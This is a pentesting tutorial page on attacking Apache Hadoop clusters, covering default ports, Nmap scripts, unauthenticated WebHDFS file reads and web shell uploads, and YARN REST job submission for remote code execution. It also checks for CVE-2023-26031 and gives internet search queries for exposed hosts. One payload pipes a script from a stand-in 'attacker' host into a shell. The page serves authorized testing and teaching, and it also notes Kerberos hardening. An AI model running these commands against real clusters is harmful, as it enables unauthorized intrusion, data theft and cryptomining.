---
title: "50030 - Hadoop"
weight: 50030-50060-50070-50075-50090
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **Study tip**: This document covers penetration testing of **50030-50060-50070-50075-50090 - Hadoop** and is intended as a reference for information security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorized testing only. Unauthorized testing of systems may violate laws and regulations.

---


## 50030-50060-50070-50075-50090 - Pentesting Hadoop

### **Basic Information**

**Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing.

Useful default ports:

- **50070 / 9870** NameNode (WebHDFS)
- **50075 / 9864** DataNode
- **50090** Secondary NameNode
- **8088** YARN ResourceManager web UI & REST
- **8042** YARN NodeManager
- **8031/8032** YARN RPC (often overlooked and still unauthenticated in many installs)

Unfortunately, Hadoop lacks Metasploit framework support at the time of writing. However, you can use the following **Nmap scripts** to enumerate Hadoop services:

- **`hadoop-jobtracker-info`** (port 50030)
- **`hadoop-tasktracker-info`** (port 50060)
- **`hadoop-namenode-info`** (port 50070)
- **`hadoop-datanode-info`** (port 50075)
- **`hadoop-secondary-namenode-info`** (port 50090)
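All five scripts ship with stock Nmap and can be run in a single pass. A minimal sketch that just assembles and prints the command (the target hostname is a placeholder, not a real host):

```shell
## run all five Hadoop NSE scripts in one pass (sketch: this only prints the
## command to run; TARGET is an assumed placeholder for the host under test)
TARGET=hadoop.example
PORTS=50030,50060,50070,50075,50090
SCRIPTS=hadoop-jobtracker-info,hadoop-tasktracker-info,hadoop-namenode-info,hadoop-datanode-info,hadoop-secondary-namenode-info
echo nmap -sV -p "$PORTS" --script "$SCRIPTS" "$TARGET"
```

On newer clusters substitute the 9870/9864 ports accordingly.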

Note that **Hadoop operates without authentication in its default setup**. For stronger security, Kerberos can be integrated with the HDFS, YARN, and MapReduce services.
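For reference, secure mode is switched on through a handful of properties in `core-site.xml`; a minimal sketch (these are the standard Hadoop property names, shown here without the accompanying keytab/principal settings a real deployment also needs):

```xml
<!-- core-site.xml: switch from "simple" (no auth) to Kerberos -->
<property>
  <name>hadoop.security.authentication</name>
  <value>kerberos</value>
</property>
<property>
  <name>hadoop.security.authorization</name>
  <value>true</value>
</property>
```

If a target's `core-site.xml` (readable via WebHDFS, see below) still says `simple`, everything in this document applies unauthenticated.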

### WebHDFS / HttpFS abuse (50070/9870 or 14000)

When **security=off** you can impersonate any user with the `user.name` parameter. Some quick primitives:

```bash
## list root directory
curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"

## read arbitrary file from HDFS
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs"

## upload a web shell / binary (CREATE replies with a 307 redirect to a DataNode; -L follows it and re-sends the body)
curl -L -T ./payload "http://<host>:50070/webhdfs/v1/tmp/payload?op=CREATE&overwrite=true&user.name=hdfs" -H 'Content-Type: application/octet-stream'
```

If HttpFS is enabled (default port **14000**), the same REST paths apply. Behind Kerberos you can still authenticate with `curl --negotiate -u :` and a valid ticket.

### YARN Unauthenticated RCE (8088)

The **ResourceManager REST API** accepts job submissions with no auth in the default “simple” mode (requests fall back to the anonymous `dr.who` user). Attackers abuse it to run arbitrary commands (e.g. cryptominers) without needing HDFS write access.

```bash
## 1) get an application id
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application

## 2) submit DistributedShell pointing to a command
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
  -H 'Content-Type: application/json' \
  -d '{
    "application-id":"application_1234567890000_0001",
    "application-name":"pwn",
    "am-container-spec":{
      "commands":{"command":"/bin/bash -c \"curl http://attacker/p.sh|sh\""}
    },
    "application-type":"YARN"
  }'
```
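The `application-id` used in step 2 must come from the step 1 response. A sketch that extracts it with `sed` (the JSON below is a canned sample of a `new-application` response for illustration, not live output):

```shell
## canned sample of a new-application response (assumption for illustration)
resp='{"application-id":"application_1700000000000_0001","maximum-resource-capability":{"memory":8192,"vCores":4}}'
## pull out the id so it can be substituted into the submission JSON
app_id=$(printf '%s' "$resp" | sed -n 's/.*"application-id":"\([^"]*\)".*/\1/p')
echo "$app_id"
```

After submission, `GET /ws/v1/cluster/apps/<app_id>` shows whether the container ran.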

If the **8031/8032 RPC** ports are exposed, older clusters allow the same job submission over protobuf without auth (documented in several cryptominer campaigns); treat those ports as RCE as well.

### Local PrivEsc from YARN containers (CVE-2023-26031)

Hadoop 3.3.1–3.3.4 **container-executor** loads libs from a **relative RUNPATH**. A user who can run YARN containers (including remote submitters on insecure clusters) may drop a malicious `libcrypto.so` in a writable path and get **root** when `container-executor` runs with SUID.

Quick check:

```bash
readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH'
## vulnerable if it contains $ORIGIN/:../lib/native/
ls -l /opt/hadoop/bin/container-executor   # SUID+root makes it exploitable
```

Fixed in **3.3.5**; ensure the binary is not SUID if secure containers aren’t required.

---


### Search Engine Queries

#### FOFA

```bash
# FOFA search syntax
port="50030"
```

#### Shodan

```bash
# Shodan search syntax
port:50030
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:50030
```

---

## 📖 References

- [HackTricks - 50030-hadoop](https://book.hacktricks.wiki/en/network-services-pentesting/50030-hadoop.html)

